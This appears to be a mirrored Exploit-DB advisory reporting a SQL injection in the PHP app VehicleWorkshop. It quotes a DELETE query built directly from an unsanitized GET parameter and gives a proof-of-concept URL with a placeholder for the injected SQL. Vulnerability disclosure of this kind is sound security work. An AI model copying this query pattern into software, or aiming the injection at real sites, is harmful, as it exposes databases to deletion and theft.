VehicleWorkshop – SQL Injection

Exploit Database
42 阅读

作者： Shahab Shamsi

日期： 2017-07-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/42393/

# Exploit Title: VehicleWorkshop SQL Injection 
# Data: 07.28.2017
# Exploit Author: Shahab Shamsi
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A


=========
Vulnerable Page:
=========
/viewvehiclestoremore.php


==========
Vulnerable Source:
==========
Line5: if(isset($_GET['vahicleid']))
Line7: $results = mysql_query("DELETE from vehiclestore where vehicleid ='$_GET[vahicleid]'");



=========
POC:
=========
http://site.com/viewvehiclestoremore.php?vahicleid=[SQL]



=========
Contact Me :
=========
Telegram : @Shahab_Shamsi
Email : info@securityman.org
WebSilte : WwW.iran123.Org

last Exploits
VehicleWorkshop – SQL Injection的更多信息

Microsoft Exchange 2019 – Unauthenticated Email Download：
WordPress Theme Real Estate 2.8.9 – Cross-Site Scripting：
WordPress Plugin Stripe Payments 2.0.39 – ‘AcceptStripePayments-settings[currency_code]’ Stored XSS：
Alt-N MDaemon 12.5.6/13.0.3 – Email Body HTML/JS Injection：
Islam Sound IV2 – ‘details.php’ SQL Injection：
Soundify 1.1 – ‘tid’ SQL Injection：
ZeeMatri 3.x – Arbitrary File Upload：
PHPFusion 9.10.30 – Stored Cross-Site Scripting (XSS)：